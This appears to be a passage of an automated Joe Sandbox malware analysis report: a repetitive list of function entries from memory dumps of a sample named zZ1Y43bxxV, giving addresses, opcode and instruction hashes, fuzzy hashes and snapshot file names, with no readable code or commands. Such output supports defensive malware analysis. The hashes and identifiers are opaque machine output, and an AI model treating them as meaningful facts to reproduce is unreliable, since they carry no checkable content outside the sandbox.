                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7e60f7badf813baad1828f33b5b852fd8ffc90c33cdd3de582ee170161e517c1
                                                                                                                                                                    • Instruction ID: 795239db65dc62b66681c756a47570ba2a2c8c5827e5d27db800949e4a0eebb7
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e60f7badf813baad1828f33b5b852fd8ffc90c33cdd3de582ee170161e517c1
                                                                                                                                                                    • Instruction Fuzzy Hash: 07411063E0F6BA4FE725B6ACACB14F57BE0EF02268B0502F7D099CA1D3ED0965464341
                                                                                                                                                                    Function 00007FFD9BE4C027 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b3d84cd38b74c8eb7bf0f8a894dc32b13ce05208d94392c43bff6d9a2e1cff73
                                                                                                                                                                    • Instruction ID: f8d4ad9c71ac2ca7cd32a55aec5fd54093eaaca0815b59678187f73eb83d40c4
                                                                                                                                                                    • Opcode Fuzzy Hash: b3d84cd38b74c8eb7bf0f8a894dc32b13ce05208d94392c43bff6d9a2e1cff73
                                                                                                                                                                    • Instruction Fuzzy Hash: 6941973160C9498FDF5CEF18D466EA473E1FBA9310B14456AD05EC36D2DE21E945CB41
                                                                                                                                                                    Function 00007FFD9BE44537 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 87263f49606e47b517ff59950287d74995d3e8428e347bf74406cb2b44b6d33d
                                                                                                                                                                    • Instruction ID: 14c5832a0885c0115a894141f684f0d11f4577da3805997ac2c997c672d8589b
                                                                                                                                                                    • Opcode Fuzzy Hash: 87263f49606e47b517ff59950287d74995d3e8428e347bf74406cb2b44b6d33d
                                                                                                                                                                    • Instruction Fuzzy Hash: 3341543270D9488FDF5CEF18C466EA573E1FBA836071541AED04AC3292DE25E845CB81
                                                                                                                                                                    Function 00007FFD9BA85BF0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 171813972dfa1285c13d631ff7dfc0efc522b2184547e804e123435d62e245dd
                                                                                                                                                                    • Instruction ID: 286515c2bc22f7f810840794b860cd8d18a314d38f2c468956c980ab612b7a75
                                                                                                                                                                    • Opcode Fuzzy Hash: 171813972dfa1285c13d631ff7dfc0efc522b2184547e804e123435d62e245dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E4134B0A1D85E4FEB79C75888646B87BB1FF50300F1541B9D84EC75E6CD78AA818B80
                                                                                                                                                                    Function 00007FFD9BA86EC7 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 131552928849b5c11e4583caf1884cc0d385bb3e1f5aaf719799b186d3f23541
                                                                                                                                                                    • Instruction ID: 3e34f70c45e7228ad6f4e0b33e343b773deb5c878a0e22adac8fb870cf5a9f6d
                                                                                                                                                                    • Opcode Fuzzy Hash: 131552928849b5c11e4583caf1884cc0d385bb3e1f5aaf719799b186d3f23541
                                                                                                                                                                    • Instruction Fuzzy Hash: F441813170C9498FDF98EB58C4A5DA8B7E1FBA832071445AED44AC7592DE30F885CB81
                                                                                                                                                                    Function 00007FFD9BE4C528 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a868eeece2f5f6bed5a771fceda081ad2184b4babc64330e2138548264f29214
                                                                                                                                                                    • Instruction ID: db079b382a5eddebf996c6f635dd0c2cdcbed624904092f3fdd73eeae2e27f72
                                                                                                                                                                    • Opcode Fuzzy Hash: a868eeece2f5f6bed5a771fceda081ad2184b4babc64330e2138548264f29214
                                                                                                                                                                    • Instruction Fuzzy Hash: 5841FF30A1D85E8FEB78CA5884747B87BA1EF64304F1545BBC08FC71A6DD39AA808780
                                                                                                                                                                    Function 00007FFD9BA8CEA0 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0c3ba76e476633fed2ba97c6c70d50b171f4d472f27086d9dbf203a40c361bb0
                                                                                                                                                                    • Instruction ID: b067742bf1fcdfca091f60a26f7b22f7519d118784f1dd5810695215137a43ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c3ba76e476633fed2ba97c6c70d50b171f4d472f27086d9dbf203a40c361bb0
                                                                                                                                                                    • Instruction Fuzzy Hash: 6031D631A0FBCA5FE76647A458745A47F90DF43220B0A01FBD0898A4A3E95C1E5AC751
                                                                                                                                                                    Function 00007FFD9BA8FA57 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0c38b53d3db11fa69f138ad9cf951ca7e7606d517d0e451550169cd4f673fd98
                                                                                                                                                                    • Instruction ID: 8ee98f21afee73959b63172e777aae966f36065fc74d4afaded62e2e4b665362
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c38b53d3db11fa69f138ad9cf951ca7e7606d517d0e451550169cd4f673fd98
                                                                                                                                                                    • Instruction Fuzzy Hash: ED41713260CD498FDF98EF18D4A5DA5B3E1FB6831171406AED44AC75A2DE31E885CB81
                                                                                                                                                                    Function 00007FFD9BE445E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 951cff3a45bdffd62ac8e5bc086a30faeef90d3b3daefa94ad1d607dbb3d83b3
                                                                                                                                                                    • Instruction ID: 4b803ffabb9d9729ab48ba9a26c54006dc63b50ea8b7f7090dfddc550a0e6c44
                                                                                                                                                                    • Opcode Fuzzy Hash: 951cff3a45bdffd62ac8e5bc086a30faeef90d3b3daefa94ad1d607dbb3d83b3
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B31927160C9488FDF5CEF18C465E6473E2FBA835071506ADD04AC72D2DE25E845CF81
                                                                                                                                                                    Function 00007FFD9BE4757B Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4e6c3643cdf5ba53078f816fb61d7e63b2e170c4c8676d57ad840d2ad1e69f2b
                                                                                                                                                                    • Instruction ID: f6990b7df57bd50b9041dd76e757c74e71fa1255ab6230ced2b65c0051b67bac
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6c3643cdf5ba53078f816fb61d7e63b2e170c4c8676d57ad840d2ad1e69f2b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0341F431A0E69D8FCB56EBA8D8705E87FB2EF05310F0900FBD049D71E3DA2969088795
                                                                                                                                                                    Function 00007FFD9BE4C0D1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7c0e0d773b99893c1f99b37ac0f1cc1ae00487af82592b8e8e9ac9cc6cc28fee
                                                                                                                                                                    • Instruction ID: 2c5601d33bcdacdf506af3e0e05f42685c5019c2acec3753467a18dc10f2f456
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c0e0d773b99893c1f99b37ac0f1cc1ae00487af82592b8e8e9ac9cc6cc28fee
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E3170316089498FDF9CEF28C466E6473E1FBA931071446AAD05EC76D2EE21E845CB81
                                                                                                                                                                    Function 00007FFD9BA86F71 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: eaeb95754a56ecaf12f98c9e1097c6e73a63823f12d823426c2f0308946f9760
                                                                                                                                                                    • Instruction ID: 76e7cf2cb8a81a74162727b1d644c78244d4dcff8314a40319618b0965be52af
                                                                                                                                                                    • Opcode Fuzzy Hash: eaeb95754a56ecaf12f98c9e1097c6e73a63823f12d823426c2f0308946f9760
                                                                                                                                                                    • Instruction Fuzzy Hash: 5331603160C9498FDF9DEB18C4A5DA8B7E1FBB831071446AED44AC75A2DE34F885CB81
                                                                                                                                                                    Function 00007FFD9BA89FFB Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 36c5b627389f2f0597a8c490a7bcf52e52b603d356134842c0459e00bb4b22a3
                                                                                                                                                                    • Instruction ID: 161fc61700eac387203bf3b764e8d192cc1f45e0ea96cb97986a124ef1b410c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 36c5b627389f2f0597a8c490a7bcf52e52b603d356134842c0459e00bb4b22a3
                                                                                                                                                                    • Instruction Fuzzy Hash: 41310C33B0FA9E5FF735A7BCA8354F92B609F5166070501BBD089CB4E7E86C2A0A4355
                                                                                                                                                                    Function 00007FFD9BA84756 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bba5d78967c143ee39edd1aa09bdaa0f40bd53af727c1e9b790c8ec424a164f8
                                                                                                                                                                    • Instruction ID: ed0a0da8c988ce45ee1a2c9e296b9e44630675dea9d258c4d28aee7719858f8d
                                                                                                                                                                    • Opcode Fuzzy Hash: bba5d78967c143ee39edd1aa09bdaa0f40bd53af727c1e9b790c8ec424a164f8
                                                                                                                                                                    • Instruction Fuzzy Hash: 38312831B1EA894FE3389BA868251757BE5EF46355F16053EE08FC39B2DD7879028342
                                                                                                                                                                    Function 00007FFD9BA8FB01 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b41a9484f00b3e31f9ab294218fe9d1baee52a65028279a043dccf6197f34c61
                                                                                                                                                                    • Instruction ID: a39860b4a1a93c9d11b5bf3752e149478a24f81f1d57f1037aebe924e23d38dc
                                                                                                                                                                    • Opcode Fuzzy Hash: b41a9484f00b3e31f9ab294218fe9d1baee52a65028279a043dccf6197f34c61
                                                                                                                                                                    • Instruction Fuzzy Hash: 44318131608D898FDB9CEF18C4A5D64B3E2FB7831171406AED44AC71A2DE35EC81CB81
                                                                                                                                                                    Function 00007FFD9BE4457B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: cd960194ef6b7a275cc81b8c57f9693b49e44e540c783b2d6703ca33445b5140
                                                                                                                                                                    • Instruction ID: 22cdeb0b707d85aacb2844651e568d03edcbdeded5faaa4d7ea53e67d50091a1
                                                                                                                                                                    • Opcode Fuzzy Hash: cd960194ef6b7a275cc81b8c57f9693b49e44e540c783b2d6703ca33445b5140
                                                                                                                                                                    • Instruction Fuzzy Hash: B7316F7160C9498FDF9CEF18C4A6EA4B3E2FBA835071545ADD04AC72D2DE25E845CF81
                                                                                                                                                                    Function 00007FFD9BE4C06B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f1ef1e62522f21dd99c81b1eef8e5005762e160725fdde3a1b25cacf571af746
                                                                                                                                                                    • Instruction ID: 316b2e57bbc78a53b05aca49672e35d2e78b7470ae6e3a4f49923f1ff338489f
                                                                                                                                                                    • Opcode Fuzzy Hash: f1ef1e62522f21dd99c81b1eef8e5005762e160725fdde3a1b25cacf571af746
                                                                                                                                                                    • Instruction Fuzzy Hash: 3031A23160C9498FDF9CEF28C466EA473E1FBA831071445AAD01EC36D2EE21E845CB81
                                                                                                                                                                    Function 00007FFD9BA86F0B Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ad4a65ba0bb1e87c7590f381f40c1b4766f00b64444446d69a3a145e28aa5aeb
                                                                                                                                                                    • Instruction ID: 29dcf3aea1bade0adc48695696fdace169332fc82d647bac5f7e10d6e9efad28
                                                                                                                                                                    • Opcode Fuzzy Hash: ad4a65ba0bb1e87c7590f381f40c1b4766f00b64444446d69a3a145e28aa5aeb
                                                                                                                                                                    • Instruction Fuzzy Hash: 77316F3160C9498FDF9CEB18C4A5DA8B7E2FBB831071445AED44AC75A2DE34F885CB81
                                                                                                                                                                    Function 00007FFD9BA8FA9B Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f9077f08fa1b1214c4a4fb7ddef947222c42812cb6ed7631084717d0ee3c32e2
                                                                                                                                                                    • Instruction ID: 6db7807cbe7cfe36d7f1e0a604f01d7bca16fc0767b6dab58061c0bfdd46c779
                                                                                                                                                                    • Opcode Fuzzy Hash: f9077f08fa1b1214c4a4fb7ddef947222c42812cb6ed7631084717d0ee3c32e2
                                                                                                                                                                    • Instruction Fuzzy Hash: A1316231608D498FDF9CEF18C4A5DA5B3E2FB7831171506AED44AC75A2DE35E882CB81
                                                                                                                                                                    Function 00007FFD9BA8402D Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a7d9551d71a6fd6442781d27e3926dab19c4e1224c08c096e33a69d819087c4e
                                                                                                                                                                    • Instruction ID: e6d1af5b655d06efcfc0e501f508f6358a4de5e259705b8be258c095566b3044
                                                                                                                                                                    • Opcode Fuzzy Hash: a7d9551d71a6fd6442781d27e3926dab19c4e1224c08c096e33a69d819087c4e
                                                                                                                                                                    • Instruction Fuzzy Hash: EE316271F1990E5FDB58DB9CD4A16A8B7A2EF98310B51423AD01ED3691DF347852CB80
                                                                                                                                                                    Function 00007FFD9BA8CBCD Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5c885f848f9b8a393bba97b563b2bcfd864374bb1d2c71ee3535c07e34576c7f
                                                                                                                                                                    • Instruction ID: 22af49f8547e2d0ab11c0e5605ea31dd4c887173ba6527bc8cd04cb9a0d9556f
                                                                                                                                                                    • Opcode Fuzzy Hash: 5c885f848f9b8a393bba97b563b2bcfd864374bb1d2c71ee3535c07e34576c7f
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E314072B0DD0D5FDB58DF9CD461AA8B7A2FF98320B114239D01EC3692DB74B8128B80
                                                                                                                                                                    Function 00007FFD9BE41775 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c01c9952d0a7759956f155c67fb3e4fad0350287df8e5130b627c5b646cbf287
                                                                                                                                                                    • Instruction ID: cc28dda6f75e23acd5a3630be28af084ede489c415c68126429d40f985a7a646
                                                                                                                                                                    • Opcode Fuzzy Hash: c01c9952d0a7759956f155c67fb3e4fad0350287df8e5130b627c5b646cbf287
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A310872F0D54D4FEB58EBA844222E8BBE6EF55340F150279D05EC31D2DE2969028781
                                                                                                                                                                    Function 00007FFD9BE4BE35 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 795fb1ea0280080b6f3723f64df031ff2f2c7bcf78de854c6df626be8ace9521
                                                                                                                                                                    • Instruction ID: 294045cdf7bbbcac2aeb1e79cca86eaf5886faf6704fc3b0a55bd4355c6b2481
                                                                                                                                                                    • Opcode Fuzzy Hash: 795fb1ea0280080b6f3723f64df031ff2f2c7bcf78de854c6df626be8ace9521
                                                                                                                                                                    • Instruction Fuzzy Hash: 80315E34E0E50ECFEB78DBA484A15BD77BAFF84300F520176D10ED65A1DB3AAA409B41
                                                                                                                                                                    Function 00007FFD9BA86CD5 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 94f9931b5cd3cdd9d6d93b45cb36ae660beb9a85cd3c046e7d74bac19f10e763
                                                                                                                                                                    • Instruction ID: 9849e715707d87bb8ef3cebee46da41a0f74aae8540f83dd92e8cc28d544abe2
                                                                                                                                                                    • Opcode Fuzzy Hash: 94f9931b5cd3cdd9d6d93b45cb36ae660beb9a85cd3c046e7d74bac19f10e763
                                                                                                                                                                    • Instruction Fuzzy Hash: 10311B30A1AD4ECFEBA8DF8884655BD7BB2FF44300F51047AD00ED69E1DEB86A40A741
                                                                                                                                                                    Function 00007FFD9BE416BB Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e8594f808055fd29c5f435989333c992d3b14e454ad0303cb03f8bbe3dfbcce2
                                                                                                                                                                    • Instruction ID: a5788a8ff74547bcea084d13b6c21b4fcd7f774a6ee8ef8daeaaa50c651c9c40
                                                                                                                                                                    • Opcode Fuzzy Hash: e8594f808055fd29c5f435989333c992d3b14e454ad0303cb03f8bbe3dfbcce2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E312C71B1990E8FDB58DF98D4A19B8B7A2FF98310B514239D01AC36A1DF25BD12CB80
                                                                                                                                                                    Function 00007FFD9BA81E1D Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ae92ce8ae778b9bff6383d33f4e48d88fd6b425f05a8b175ca7f4c9018b0da82
                                                                                                                                                                    • Instruction ID: c1f8b47e91afdfab6aaa78f99ec98d07b81f6a79770fe6072a12b14713c66038
